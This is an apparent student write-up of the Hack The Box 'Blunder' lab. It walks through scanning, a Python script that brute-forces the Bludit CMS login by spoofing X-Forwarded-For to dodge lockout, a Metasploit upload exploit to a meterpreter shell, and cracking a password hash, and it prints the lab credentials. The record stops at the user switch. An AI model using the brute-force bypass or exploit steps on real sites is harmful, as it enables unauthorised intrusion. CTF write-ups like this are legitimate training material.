# Machine Write Up ::: Blunder #
* Difficulty: easy, OS: Linux, Type: CVE, webpage exploitation, password cracking, privilege escalation
* Write up for Jacob Scheetz, htb-user: sxh 

## Steps to Solve ##
* Disclaimer: the steps to solve this box are either my own, in conjunction with students in the ACM of UD, or a combination of both
* these steps are condensed to show the correct path to establishing a reverse shell for the target machine, this write up does NOT in any way reveal the flag or encourage flag sharing for the exercise

### step one: reconnaissance ###
* I always start out by pinging the machine and doing an namp scan:
![nmap scan](/images/blunder/nmap-scan.png)
* nmap returned that port 80 was open and port 21 was filtered
* we also can see that on port 80, there is an apache server on version 2.4.41 running on a Ubuntu box
* because of this, I went to a web browser to see if we could access what is being hosted by the server
![webpage image](/images/blunder/webpage.png)
* after looking around on the site, there wasn't anything exciting in the source code so I decided to use `gobuster` to crawl the site

* using the wordlist repository found at: https://github.com/danielmiessler/SecLists I ran the command `gobuster dir --url http://10.10.10.191/ -t 50 -w ~/Desktop/list.txt -o gobuster.out`
![gobuster] (/images/gobuster-blunder.png)
* this is utilizing the wordlist common.txt from the previously mentioned repo, the idea behind this is to crawl the directories and scrape any releva infomation that we may need
* the results of this crawl are in the photo below:
![gobuster results](/images/blunder/gobuster-results)
* the interesting files that appear in these results are /admin and /robots.txt, /admin is the priority here though
* upon inspection of the /admin directory, we now know there is a Content Management System on this server called "Bludit"
![admin page](/images/blunder/admin-page.png)


### step two: setting up exploits ###
* since we know that there is a login to the CMS through this site, it makes sense that this is the target to exploit to move forward in the puzzle
* I decide to use `searchsploit` to quickly find any vulnerabilities associated with the CMS by running the command `searchsploit bludit`
![searchsploit](/images/blunder/searchsploit.png)
* It appears from the results that there is exploits associated with both txt and php 

* so I re-scraped the site with gobuster but specifically looking for txt and php mentions:
![re-scrape](/images/blunder/scrape2.png)
* the command used in this scrape was: `gobuster dir --url http://10.10.10.191/ -t 50 -w ~/Desktop/SecLists-master/discovery/Web-content/common.txt -o gobuster_out2.out -x php,txt -s 200, 204, 401, 403`
* this is going to specifically look for php,txt matches with the corresponding success codes
* the result is: 
![rescrape-result](/images/blunder/scrape2-result.png)

* from the results we can see that there is a new entry, which is /todo.txt
* this webpage looks like:
![todo](/images/blunder/todo.png)

* genuinely got stuck here for a minute, not sure if I missed something that would have indicated more clearly that fergus is the username of the admin or what. But I eventually came to the conclusion that since it says "fergus needs to upload the blog images" I assumed he was the admin due to the vulnerabiltiy I found with bludit being an image upload vulnerability

* figuring that we now had the admin username, a bruteforce attack is now possible against the login system. What we don't have though is a custom wordlist to attack the system with. 
* to create a custom wordlist against a site I used `cewl` and ran the command `cewl -w ~/Desktop/wordlist.txt -d 10 http://10.10.10.191`
![cewl](/images/cewl.png)
* the results of this should look something like this:
![cewl-results](/images/blunder/cewl-results.png)

* at this point we need the bruteforce capability agianst this CMS.
* by searching for a bludit bruteforce bypass exploit in google, we get a dcript from: https://rastating.github.io/bludit-brute-force-mitigation-bypass/
* this is what I ended up with after replacing the username, host and wordlist:
``` 
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191/'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []

# Generate 50 incorrect passwords
for i in range(50):
    wordlist.append('Password{i}'.format(i = i))

# Add the correct password to the end of the list
wordlist.append('~/Desktop/wordlist.txt')

for password in wordlist:
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
```
* I saved this python script as exploit.py to run the bruteforce once necessary
* running the script `python exploit.py` it will look like this:
![py-exploit](/images/blunder/py-exploit.png)


* the success code, looks like this:
![py-exploit-success](/images/blunder/py-exploit-success.png)
* this means the username is 'fergus' and the password is 'RolandDeschain'


### step three: exploiting and establishing a shell ###

* we now have admin credentials for the CMS 
* with these relevant credetnials we can refer back to the `searchsploit` results we got from earlier that indicated there was a relevant exploit in bludit for an image upload process 
* by searching 'bludit' on https://www.rapid7.com/db/ - we can see the documentation for this CVE
![documentation](/images/blunder/exploit-doc.png)

* it looks like that this exploit is already loaded into `msfconsole` 
* by following the directions provided from rapid7, this is what loading the payload looks like in msfconsole:
![msf-console](/images/blunder/msfconsole1.png)

![msf-consolerc](/images/blunder/msfconsole2.png)
* the payload is now primed to be executed 

![msfexec](/images/blunder/msfexec.png)
* after running exploit, we can see that we now have a shell with meterpreter


### step four: finding the flag (system own) ###
* upon getting the meterpreter shell we can run `sysinfo` to confirm what we are working with
* by using `cd` and `ls` we can look around the directories on the CMS
* by going into the bludit version directories we can see a users.php file that looks interesting
![looking around](/images/blunder/lookaround.png) 
 * the contents of user.php are below:
 ![users](/images/blunder/users.png)
 
 * we get two imoprtant pieces of info here, the username of the admin on the system 'hugo' and the password
 * if we look at the password here, it becomes obvious that we are dealing with a hashed password
 * by googling a site to reverse the hash we get this:
 ![reversed hash](/images/blunder/hashed.png)

* we can now try to get into the actual server hosting the CMS now with this info
* by using the `shell` command from meterpreter, we can try to drop into a system shell 
* once this is established we can use `su hugo` to switch users and enter the hashed password 'Password120'








